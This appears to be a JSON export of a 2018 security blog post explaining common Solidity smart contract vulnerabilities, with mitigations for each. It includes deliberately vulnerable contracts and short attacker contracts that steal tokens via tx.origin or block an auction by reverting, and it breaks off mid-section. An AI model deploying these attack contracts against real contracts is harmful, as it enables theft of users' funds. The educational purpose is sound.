{"id":2791,"date":"2018-05-25T07:49:34","date_gmt":"2018-05-25T07:49:34","guid":{"rendered":"http:\/\/nethemba.com\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"modified":"2018-05-28T05:58:57","modified_gmt":"2018-05-28T05:58:57","slug":"summary-of-the-common-smart-contracts-vulnerabilities","status":"publish","type":"post","link":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","title":{"rendered":"Summary of the common smart contracts vulnerabilities"},"content":{"rendered":"<h1><span style=\"font-weight: 400;\">Introduction<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. With billions of dollars at play and relatively low-level of smart contract security enlightenment, smart contracts written in Solidity have been successfully exploited by a malicious user, and hundreds of millions worth of crypto funds have been stolen.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The goal of this article is to highlight frequent security vulnerabilities of contracts written in Solidity language and explain ways how to identify and mitigate them.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h1><span style=\"font-weight: 400;\">Dangerous assumptions<\/span><\/h1>\n<p><span style=\"font-weight: 400;\">Here is a list of assumptions one smart contract developer should <\/span><b>NOT <\/b><span style=\"font-weight: 400;\">make to stay out of trouble.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNo one can send funds to my contract unless I allow them to\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">In Solidity, for a contract to be able to receive funds, at least one function has to be marked as 
\u2018payable\u2019. However, there are two special ways someone can \u201cforce send\u201d funds to your contract even if none of the functions in your contract is marked as \u2018payable\u2019:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"color: #ff0000;\"><b>selfdestruct<\/b><\/span><span style=\"font-weight: 400;\"> function (see <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/latest\/units-and-global-variables.html#contract-related\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">Solidity docs<\/span><\/a><span style=\"font-weight: 400;\">)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Anyone can call <\/span><span style=\"color: #ff0000;\"><b>selfdestruct<\/b><\/span><span style=\"font-weight: 400;\">(&lt;your_contract_address&gt;) in their contract and send the balance of their contract to your contract.<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Mining reward<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">A miner can set the address of your contract as the mining reward address, and when this miner successfully mines a block, your contract will be credited with the mining reward.<\/span><\/p>\n<p><b>Lesson learned:<\/b><span style=\"font-weight: 400;\"> Never assume that the balance of your contract is 0 because anybody can send funds to your contract even if you haven\u2019t explicitly allowed your contract to receive funds.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> This characteristic of Ethereum smart contracts cannot be avoided.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNo one can read the value of my private variable\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">A variable in Solidity is either <\/span><span style=\"font-weight: 400; color: 
#ff0000;\">private<\/span><span style=\"font-weight: 400;\">. The value of a public variable is accessible to any contract via a getter function automatically created by the compiler. Marking a variable as private prevents other contracts from accessing and modifying it, but a private variable is still stored on the blockchain, so it is <\/span><b>visible to everyone<\/b><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let\u2019s use the following contract to demonstrate how to read the value of a private variable.<\/span><\/p>\n<table style=\"width: 530.129px;\">\n<tbody>\n<tr>\n<td style=\"width: 525.129px;\"><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract GuessingGame {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0address public winner;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0int private secretNumber;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0constructor(int _secretNumber) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0secretNumber = _secretNumber;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function guess(int _secretNumber) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(winner == address(0));<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(secretNumber == _secretNumber);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0winner = msg.sender;<\/span><br \/>\n<span style=\"color: #808080;\"><span style=\"font-weight: 400;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400;\">}<\/span><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">If you know 
the address of the contract\u2019s instance, then the value of <\/span><span style=\"font-weight: 400;\">secretNumber<\/span> <span style=\"font-weight: 400;\">can be easily read via the <\/span><a href=\"https:\/\/github.com\/ethereum\/web3.js\"><span style=\"font-weight: 400;\">web3.js<\/span><\/a><span style=\"font-weight: 400;\"> library.<\/span><\/p>\n<table style=\"width: 443.078px;\">\n<tbody>\n<tr>\n<td style=\"width: 436.078px;\"><span style=\"font-weight: 400; color: #808080;\">\/\/ create callback to display returned value<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">var callback = function(error, result){<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0if(!error)<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0window.alert(result);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0else<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0window.alert(error);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">};<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">\/\/ read value from contract\u2019s storage<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">web3.eth.getStorageAt(&#39;&lt;contract address&gt;&#39;, 1, callback); <\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">The Web3.js <\/span><a href=\"https:\/\/github.com\/ethereum\/wiki\/wiki\/JavaScript-API#web3ethgetstorageat\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">getStorageAt<\/span><\/a> <span style=\"font-weight: 400;\">command reads the value from the contract\u2019s storage and returns a hexadecimal representation of the variable\u2019s value. 
It is necessary to convert the returned value from hex to decimal representation to get the integer value of <\/span><span style=\"font-weight: 400;\">secretNumber<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Note that the value of the second parameter of the <\/span><span style=\"font-weight: 400;\">getStorageAt<\/span><span style=\"font-weight: 400;\"> function is 1 because we are interested in the value of the second state variable of the GuessingGame contract instance. To retrieve the value of <\/span><span style=\"font-weight: 400;\">winner<\/span><span style=\"font-weight: 400;\"> (the first state variable) via <\/span><span style=\"font-weight: 400;\">getStorageAt<\/span><span style=\"font-weight: 400;\">, we would call it with 0 as the value of the second parameter. Here you can read more about <\/span><a href=\"https:\/\/medium.com\/aigang-network\/how-to-read-ethereum-contract-storage-44252c8af925\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">How to read Ethereum contract storage<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><b>Lesson learned: <\/b><span style=\"font-weight: 400;\">All information stored on the blockchain is <\/span><b>publicly visible<\/b><span style=\"font-weight: 400;\">, including all contract state variables.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> One way to overcome the described limitation\/feature of the blockchain is to store a hashed or encrypted <\/span><span style=\"font-weight: 400;\">secretNumber<\/span><span style=\"font-weight: 400;\"> instead of the plain integer. 
An example of how to \u201chide\u201d information on the blockchain can be found <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/latest\/solidity-by-example.html#id2\" target=\"_blank\" rel=\"noopener\"><span style=\"font-weight: 400;\">here<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201ctx.origin is the same as msg.sender\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">There are two variables &#8211; <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> and <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> &#8211; in a Solidity contract\u2019s global namespace which look very similar, but interchanging them might lead to a severe security vulnerability. <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> returns the address which initiated the current transaction. On the other hand, <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> returns the address which originated the current message call. 
<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Following contracts demonstrate the difference between transaction and message call.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract A {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function functionA(address _otherContractAddress) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0B contractB = B(_otherContractAddress);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0contractB.functionB();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract B {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0function functionB() public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ do something<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">There are 3 different addresses relevant for our example:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address1&gt; &#8211; address which executes functionA on instance of contract A<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address2&gt; &#8211; address of contract A instance<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">&lt;address3&gt; &#8211; address of contract B instance<\/span><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><span style=\"font-weight: 400;\">When &lt;address1&gt; calls <\/span><span style=\"font-weight: 
400;\">functionA <\/span><span style=\"font-weight: 400;\">on the instance of contract A with <\/span><span style=\"font-weight: 400;\">_otherContractAddress<\/span><span style=\"font-weight: 400;\"> parameter value equal to &lt;address3&gt;, then in <\/span><span style=\"font-weight: 400;\">functionA<\/span><span style=\"font-weight: 400;\"> the value of <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> and <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">msg.sender<\/span> <\/span><span style=\"font-weight: 400;\">will be the same and equal to &lt;address1&gt;. Then when <\/span><span style=\"font-weight: 400;\">functionA<\/span><span style=\"font-weight: 400;\"> calls <\/span><span style=\"font-weight: 400;\">functionB<\/span><span style=\"font-weight: 400;\"> on the instance of contract B then <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> will be &lt;address1&gt; and <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> will be &lt;address2&gt;.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let\u2019s take a look at how authorization via <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> can be exploited on the simplified version of a standard token contract.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Token {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0function transfer(address _to, uint _value) public {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ checks to make 
sure that tx.origin has enough tokens<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\/\/ &#8230;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[tx.origin] -= _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[_to] += _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><span style=\"font-weight: 400;\">The following contract can be used to steal victim\u2019s tokens.<\/span><\/p>\n<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Token {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function transfer(address _to, uint _value) external;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0address attackerAddress;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0Token contractToAttack;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0constructor(address _contractToAttack) public {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0contractToAttack = Token(_contractToAttack);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0attackerAddress = msg.sender;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\/\/ fallback function<\/span><br \/>\n<span style=\"color: 
#808080;\"><span style=\"font-weight: 400;\"> \u00a0function () public payable {<\/span><span style=\"font-weight: 400;\"><br \/>\n \u00a0\u00a0\u00a0contractToAttack.transfer(attackerAddress, 10000);<\/span><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">If an attacker tricks the victim into sending some funds to the address of the MaliciousContract instance, then the fallback function of MaliciousContract will call the transfer function of the Token contract instance and transfer the victim\u2019s tokens to the attacker\u2019s address. In the transfer function, <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> will be the victim&#8217;s address, because the victim initiated this transaction by sending funds to the MaliciousContract instance, while <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\"> will be the malicious contract&#8217;s address. 
<\/span><\/p>\n<p><b>Lesson learned:<\/b> <span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> is not always the same as <\/span><span style=\"font-weight: 400; color: #ff0000;\">msg.sender<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><b>How to mitigate:<\/b><span style=\"font-weight: 400;\"> Never use <\/span><span style=\"font-weight: 400; color: #ff0000;\">tx.origin<\/span><span style=\"font-weight: 400;\"> for authorization.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cSending funds is always successful\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Solidity offers following functions to send funds:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">transfer<\/span><span style=\"font-weight: 400;\"> &#8211; throws on failure, forwards 2300 gas stipend, not adjustable<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> &#8211; returns false on failure, forwards 2300 gas stipend, not adjustable<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400; color: #ff0000;\">call<\/span><span style=\"font-weight: 400;\"> &#8211; returns false on failure, forwards all available gas, adjustable<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">The difference between these listed functions is how they behave on failure and how much gas they forward.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Let&#8217;s use the following contract to illustrate why it can be dangerous to assume that sending funds is always successful. 
The following contract is a simplified version of an auction contract.<\/span><\/p>\n<table style=\"width: 363.117px;\">\n<tbody>\n<tr>\n<td style=\"width: 357.117px;\"><span style=\"font-weight: 400; color: #808080;\">pragma solidity ^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract Auction {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0uint public highestBid;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0address public highestBidder; <\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid() public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0require(msg.value &gt; highestBid);<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (highestBid &gt; 0) {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ send money back to current highest bidder<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0require(highestBidder.send(highestBid));<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ store new highest bidder<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0highestBidder = msg.sender;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0highestBid = msg.value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: 
#808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">This contract would work correctly if only <\/span><a href=\"https:\/\/github.com\/ethereum\/wiki\/wiki\/Ethereum-Development-Tutorial#introduction\"><span style=\"font-weight: 400;\">EOAs<\/span><\/a><span style=\"font-weight: 400;\"> (Externally Owned Accounts) are bidding, but any malicious contract can prevent other people from bidding by intentionally refusing incoming funds. There are a few ways that contracts can refuse funds:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">revert<\/span>()<\/span><span style=\"font-weight: 400;\"> or throw (via <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">require<\/span>()<\/span><span style=\"font-weight: 400;\"> or <\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">assert<\/span>()<\/span><span style=\"font-weight: 400;\">) in the fallback function<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">intentionally running out of gas in the fallback function<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">omitting the <\/span><span style=\"font-weight: 400; color: #ff0000;\">payable<\/span><span style=\"font-weight: 400;\"> keyword for the fallback function<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">If a malicious contract is currently the highest bidder, then no one else is able to place their bid, because <\/span><span style=\"font-weight: 400;\">require(highestBidder.send(highestBid)) <\/span><span style=\"font-weight: 400;\">always throws, and this way the malicious contract would ensure that it wins this auction.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Here is an example of how a malicious contract may look:<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">pragma solidity 
^0.4.22;<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">interface Auction {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid() external payable ;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\">contract MaliciousContract {<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function bid(address auctionAddress) public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Auction auction = Auction(auctionAddress);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0auction.bid.value(msg.value)();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><\/p>\n<p><span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0function () public payable {<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0revert();<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">}<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><b>Real World Example:<\/b><span style=\"font-weight: 400;\"> \u00a0Few <\/span><a href=\"http:\/\/www.kingoftheether.com\/postmortem.html\"><span style=\"font-weight: 400;\">people didn\u2019t get compensated<\/span><\/a><span style=\"font-weight: 400;\"> because creators of <\/span><a href=\"https:\/\/www.kingoftheether.com\/thrones\/kingoftheether\/index.html\"><span style=\"font-weight: 400;\">King of the ether<\/span><\/a><span style=\"font-weight: 400;\"> pyramid scheme forgot to check the return value of <\/span><span style=\"font-weight: 400; color: #ff0000;\">send<\/span><span style=\"font-weight: 400;\"> call. 
<\/span><\/p>\n<p><b>Lesson learned:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Never assume that sending funds is always successful.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Always check the return value from low-level call functions (<\/span><span style=\"font-weight: 400;\"><span style=\"color: #ff0000;\">call, callcode, delegatecall<\/span> <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> send<\/span><span style=\"font-weight: 400;\">)<\/span><\/li>\n<\/ul>\n<p><b>Tip:<\/b><span style=\"font-weight: 400;\"> Avoid invoking too much logic(e.g., multiple send calls) in one transaction, because your transaction might run out of gas. <\/span><a href=\"https:\/\/www.reddit.com\/r\/ethereum\/comments\/4ghzhv\/governmentals_1100_eth_jackpot_payout_is_stuck\/\"><span style=\"font-weight: 400;\">1100 ETH(~8k USD at that time) got stuck in limbo<\/span><\/a><span style=\"font-weight: 400;\"> because <\/span><a href=\"http:\/\/governmental.github.io\/GovernMental\/\"><span style=\"font-weight: 400;\">GovernMental<\/span><\/a><span style=\"font-weight: 400;\"> Ponzi scheme contract was programmed to iterate over growing array of integers in the jackpot payout procedure. 
Eventually, the array became too long and the transaction always ran out of gas.<\/span><\/p>\n<p><b>How to mitigate:<\/b><\/p>\n<ol>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Always handle the possibility that an external call can fail by checking the return value when a low-level call method (<\/span><span style=\"font-weight: 400; color: #ff0000;\">call, callcode, delegatecall <\/span><span style=\"font-weight: 400;\">and<\/span><span style=\"font-weight: 400; color: #ff0000;\"> send<\/span><span style=\"font-weight: 400;\">) is used.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It is recommended to use the <\/span><a href=\"http:\/\/solidity.readthedocs.io\/en\/v0.4.21\/common-patterns.html?highlight=checks%20effects%20interaction#withdrawal-from-contracts\"><span style=\"font-weight: 400;\">Withdrawal pattern<\/span><\/a><span style=\"font-weight: 400;\"> (also known as <\/span><a href=\"https:\/\/consensys.github.io\/smart-contract-best-practices\/recommendations\/#favor-pull-over-push-for-external-calls\"><span style=\"font-weight: 400;\">favor pull over push for external calls<\/span><\/a><span style=\"font-weight: 400;\">) and only let the user withdraw funds after the fact instead of sending money right away. Some users might complain that withdrawing funds is an additional interaction with the contract which affects usability, but it is ultimately up to the contract creator to decide if the additional security is worth the sacrifice in usability. 
<\/span><a href=\"https:\/\/medium.com\/@makoto_inoue\/a-smartcontract-best-practice-push-pull-or-give-b2e8428e032a\"><span style=\"font-weight: 400;\">This<\/span><\/a><span style=\"font-weight: 400;\"> article offers an interesting analysis of user preferences when it comes to getting funds out from contracts.<\/span><\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<h2><span style=\"font-weight: 400;\">\u201cNumbers behave as expected\u201d<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">There are 2 types (with 4 subtypes) to store numbers in Solidity:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Integers &#8211; signed and unsigned integers of various sizes<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Fixed point numbers &#8211; signed and unsigned fixed-point number of various sizes<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Currently, fixed-point numbers are not fully supported; therefore we will discuss only integers. Unsigned integers are known for their overflow and underflow behavior which might surprise many developers.<\/span><\/p>\n<p><b>Overflow<\/b><span style=\"font-weight: 400;\"> happens when an unsigned integer(uint256) variable has a maximum integer value (2\u00b2\u2075\u2076-1), and it is increased by 1, then its value becomes 0. This behavior is similar to car odometer roll-over.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">uint256 max = 2**256-1; \/\/ max has maximum value which can be stored in unsigned integer<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">max += 1; \/\/ max has 0 value<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><b>Underflow<\/b><span style=\"font-weight: 400;\"> works in a similar but opposite way; it occurs when an unsigned integer(uint256) variable has the value of 0, and it is decreased by 1. 
Its value then becomes the maximum possible integer value (2\u00b2\u2075\u2076-1).<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"font-weight: 400; color: #808080;\">uint256 min = 0; \/\/ min has 0 value<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\">min -= 1; \/\/ min has 2**256-1 value <\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-weight: 400;\">The following simplified token contract demonstrates how dangerous overflow and underflow can be.<\/span><\/p>\n<table>\n<tbody>\n<tr>\n<td><span style=\"color: #808080;\"><span style=\"font-weight: 400;\">pragma solidity ^0.4.22;<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">contract Token {<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> \u00a0mapping(address =&gt; uint) balances;<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> \u00a0function transfer(address _to, uint _value) public {<\/span><\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0require(balances[msg.sender] - _value &gt;= 0);<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[msg.sender] -= _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0\u00a0\u00a0balances[_to] += _value;<\/span><br \/>\n<span style=\"font-weight: 400; color: #808080;\"> \u00a0}<\/span><br \/>\n<span style=\"font-weight: 400; color: 